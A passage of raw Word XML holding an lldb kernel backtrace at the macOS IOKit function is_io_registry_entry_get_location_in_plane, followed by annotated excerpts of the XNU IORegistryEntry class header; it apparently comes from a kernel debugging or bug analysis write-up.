        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>io_name_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plane</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>io_name_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A73BBA" w:rsidRPr="00A73BBA" w:rsidRDefault="00A73BBA" w:rsidP="002151C5"/>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(lldb) bt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>* thread #2: tid = 0x96d6, 0xffffff800dcb559d kernel.development`::is_io_registry_entry_get_location_in_plane(io_object_t, char *, char *) [inlined] OSMetaClassBase::safeMetaCast(me=&lt;unavailable&gt;) at OSMetaClass.cpp:165, name = '0xffffff80213837e0', queue = '0x0', stop reason = signal SIGSTOP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  * frame #0: 0xffffff800dcb559d kernel.development`::is_io_registry_entry_get_location_in_plane(io_object_t, char *, char *) [inlined] OSMetaClassBase::safeMetaCast(me=&lt;unavailable&gt;) at OSMetaClass.cpp:165 [opt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #1: 0xffffff800dcb559d kernel.development`::</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>is_io_registry_entry_get_location_in_plane</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(registry_entry=0xffffff801eaf1aa0, planeName="IOService", location="") + 29 at IOUserClient.cpp:2660 [opt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #2: 0xffffff800d758034 kernel.development`_Xio_registry_entry_get_location_in_plane(InHeadP=&lt;unavailable&gt;, OutHeadP=0xffffff801ecdbc78) + 212 at device_server.c:6729 [opt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frame #3: 0xffffff800d6843d3 kernel.development`ipc_kobject_server(request=0xffffff8023ceb000) + 259 at ipc_kobject.c:340 [opt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #4: 0xffffff800d65fe93 kernel.development`ipc_kmsg_send(kmsg=&lt;unavailable&gt;, option=&lt;unavailable&gt;, send_timeout=0) + 211 at ipc_kmsg.c:1443 [opt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #5: 0xffffff800d676915 kernel.development`mach_msg_overwrite_trap(args=&lt;unavailable&gt;) + 197 at mach_msg.c:474 [opt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #6: 0xffffff800d77fac0 kernel.development`mach_call_munger64(state=0xffffff8020e759c0) + 480 at bsd_i386.c:560 [opt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #7: 0xffffff800d7b58a6 kernel.development`hndl_mach_scall64 + 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36ED4">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F36ED4" w:rsidRPr="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="00F36ED4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A43021" w:rsidRDefault="00A43021" w:rsidP="00A43021">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IORegistryEntry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A43021" w:rsidRPr="00A43021" w:rsidRDefault="00A43021" w:rsidP="00A43021">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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class IORegistryEntry : public OSObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract The base class for all objects in the registry.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion The IORegistryEntry base class provides functions for describing graphs of connected registry entries, each with a dictionary-based property table. Entries may be connected in different planes, with differing topologies. Access to the registry is protected against multiple threads. Inside the kernel planes are specified with plane objects and are published by the creator - IOService exports the gIOServicePlane plane object for example. Non kernel clients specify planes by their name.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:b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class</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public</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br/>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frien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lass</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IORegistryIterator</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OSDeclareDefaultStructors</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rotected</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struct ExpansionData</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This structure will be used to expand the capablilties of this class in the future.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    */</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    </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ruct</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExpansionData</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:b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uint64_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fRegistryEntryID</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var reserved</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    Reserved for future use.  (Internal use only)  */</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExpansionData</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reserved</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rivate</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color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fRegistryTabl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color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fPropertyTable</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ublic</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methods available in Mac OS X 10.1 or lat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 Available in Mac OS X 10.1 or later.</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A reference on any found property is returned to caller, which should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 Available in Mac OS X 10.1 or later.</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w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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n OSString.</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A reference on any found property is returned to caller, which should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 Available in Mac OS X 10.1 or later.</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n OSSymbol.</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A reference on any found property is returned to caller, which should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arentEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Returns an registry entry's first parent entry in a plane. Available in Mac OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> X 10.1 or later.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This function will return the parent to which a registry entry was first attached. Since the majority of registry entrys have only one provider, this is a useful simplification.</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the first parent of the registry entry, or zero if the entry is not attached into the registry in that plane. A reference on the entry is returned to caller, which should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arent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ChildEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Returns an registry entry's first child entry in a plane. Available in Mac OS X 10.1 or later.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This function will return the child which first attached to a registry entry.</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the first child of the registry entry, or zero if the entry is not attached into the registry in that plane. A reference on the entry is returned to caller, which should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Child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method available in Mac OS X 10.4 or later */</w:t>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w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @typedef Action</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion Type and arguments of callout C function that is used when</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>a runCommand is executed by a client.  Cast to this type when you want a C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>member function to be used.  Note the arg1 - arg3 parameters are passed straight pass through to the action callout.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param target</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    Target of the function, can be used as a refcon.  Note if a C++ function</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>was specified, this parameter is implicitly the first parameter in the target</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>member function's parameter list.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param arg0 Argument to action from run operation.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param arg1 Argument to action from run operation.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param arg2 Argument to action from run operation.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param arg3 Argument to action from run operation.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:b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typedef</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IOReturn</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ction</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)(</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targe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0</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1</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2</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3</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runPropertyAction</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Single thread a call to an action w.r.t. the property lock</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discussion Client function that causes the given action to be called in a manner that syncrhonises with the registry iterators and serialisers.  This functin can be used to synchronously manipulate the property table of this nub</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param action Pointer to function to be executed in work-loop context.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param arg0 Parameter for action parameter, defaults to 0.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param arg1 Parameter for action parameter, defaults to 0.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param arg2 Parameter for action parameter, defaults to 0.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param arg3 Parameter for action parameter, defaults to 0.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result Returns the value of the Action callout.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:b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turn</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
